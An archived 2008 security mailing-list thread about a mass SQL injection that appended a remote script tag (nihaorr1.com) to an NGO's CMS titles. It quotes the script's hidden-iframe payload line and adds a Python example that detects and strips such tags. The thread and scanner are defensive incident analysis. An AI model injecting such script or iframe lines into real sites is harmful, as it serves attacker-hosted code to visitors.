Security Incidents mailing list archives
Re: Mysterious JavaScript appearance in website database
From: "Yuli Stremovsky" <stremovsky () gmail com>
Date: Tue, 15 Apr 2008 19:49:10 +0300
I can advise you to update your CMS system, including all plugins, and install an SQL firewall. You can use the GreenSQL db firewall to protect a MySQL server from SQL injection attacks.

http://www.greensql.net/

Best regards,
Yuli

On Tue, Apr 15, 2008 at 2:53 AM, Jon Oberheide <jon () oberheide org> wrote:
> Looks like an SQL injection attack. Take a look in your MS-SQL database at the affected entries and I bet you'll see the nmidahena reference.
>
> Since this is a widespread, automated attack that has affected other sites, it's unlikely it was targeted at your specific organization or custom CMS. Give your codebase a thorough audit for SQL injection vectors.
>
> Regards,
> Jon Oberheide
>
> On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
> > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the titles of much of the content on our website:
> >
> > <script src=http://www.nihaorr1.com/1.js></script>
> >
> > NB: the last modified dates for all of the content containing a reference to this script are identical, right down to the 1/100 second.
> >
> > The contents of the script apparently attempt to open an iframe to a non-existent domain, "nmidahena.com":
> >
> > document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
> >
> > I haven't found any reports of a new worm, etc. that might account for this, but when I Google "nmidahena.com" I get over 100,000 hits for other sites on which this script is present.
> >
> > We are running a custom-developed CMS with MS-SQL Server 2000 as the backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes released prior to NT4's end-of-life declaration by MS, for what it's worth.)
> >
> > Anyone have an idea what might have caused this?
>
> --
> Jon Oberheide <jon () oberheide org>
> GnuPG Key: 1024D/F47C17FE
> Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
-- http://www.kyplex.com/
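
The thread's suggestion to look at the affected database entries can be carried out on an export of the content table. The following is an added example, not code from any poster in this thread: it finds external script tags appended to text fields, counts the hosts they point to, and produces cleaned values. The `(id, title)` row layout, the function names and the `trusted_hosts` parameter are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# <script ... src=URL ...>, URL quoted or not, plus a closing tag (whole or cut off at end of value).
SCRIPT_RE = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^\s"'>]+)["']?[^>]*>"""
    r"""(?:\s*</script\s*>|\s*</\w*\Z)?""",
    re.IGNORECASE)

def script_host(src):
    """Host part of a script URL, or '' for a relative (same-site) path."""
    try:
        return (urlparse(src).hostname or "").lower()
    except ValueError:  # malformed URL: report the raw value instead
        return src.lower()

def scan_rows(rows, trusted_hosts=()):
    """Return (findings, cleaned); relative and trusted-host scripts are left in place."""
    trusted = {h.lower() for h in trusted_hosts}
    findings, cleaned = [], {}
    for row_id, text in rows:
        hits = []
        def strip_untrusted(match):
            host = script_host(match.group(1))
            if host == "" or host in trusted:
                return match.group(0)
            hits.append(host)
            return ""
        new_text = SCRIPT_RE.sub(strip_untrusted, text)
        if hits:
            findings.append((row_id, hits))
            cleaned[row_id] = new_text.rstrip()
    return findings, cleaned

def hosts_by_count(findings):
    return Counter(h for _, hits in findings for h in hits).most_common()

# Constructed sample export of (id, title); only the script URL comes from the thread.
SAMPLE_ROWS = [
    (1, "Annual report 2007<script src=http://www.nihaorr1.com/1.js></script>"),
    (2, "Volunteer sign-up"),
    (3, 'Photo gallery<script src="/js/gallery.js"></script>'),
    (4, "Press release<SCRIPT SRC=http://www.nihaorr1.com/1.js></SCRIPT>"
        "<script src=http://www.nihaorr1.com/1.js></script>"),
    (5, "Donate<script src=http://www.nihaorr1.com/1.js></scr"),
]
```

Calling `scan_rows(SAMPLE_ROWS)` flags rows 1, 4 and 5 and leaves the site's own relative script in row 3 alone. Cleaning the stored values removes only the symptom; the injection point in the application still has to be found and fixed, as Jon's reply advises.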